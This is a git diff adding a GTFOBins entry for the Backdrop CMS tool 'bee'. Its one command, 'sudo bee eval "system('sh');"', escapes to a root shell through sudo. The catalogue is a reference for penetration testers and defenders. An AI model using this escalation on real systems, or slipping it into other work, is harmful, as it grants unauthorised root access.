diff --git a/_gtfobins/bee.md b/_gtfobins/bee.md new file mode 100644 index 00000000..f7a84e52 --- /dev/null +++ b/_gtfobins/bee.md @@ -0,0 +1,7 @@ +--- +functions: + sudo: + - description: For this to work [`bee`](/gtfobins/bee/) must be excuted from the Backdrop CMS root directory (e.g. `/var/www/html`). + code: | + sudo bee eval "system('sh');" +---